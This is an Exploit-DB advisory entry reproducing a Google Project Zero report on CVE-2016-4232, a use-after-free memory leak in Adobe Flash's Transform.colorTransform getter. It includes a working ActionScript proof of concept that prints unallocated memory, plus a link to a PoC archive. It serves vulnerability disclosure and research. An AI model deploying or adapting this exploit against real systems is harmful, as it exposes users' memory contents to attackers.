Adobe Flash - Transform.colorTranform Getter Infomation Leak

Author: Google Security Research
type: dos
platform: multiple
port: 
date_added: 2016-09-08 
date_updated: 2016-10-21 
verified: 1 
codes: CVE-2016-4232 
tags: 
aliases:  
screenshot_url:  
application_url: 

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845

There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.

A minimal PoC is as follows:

this.createEmptyMovieClip( "mc", 1);
var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
var t:Transform = new Transform( mc );
t.colorTransform = c;
this.createTextField( "tf", 2, 0, 0, 2000, 200);
var ct = ColorTransform;
var g = flash.geom;
g.addProperty("ColorTransform", func, func);
var q = t.colorTransform;
tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;

function func(){

	mc.removeMovieClip();

	return ct;

	}


A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40355.zip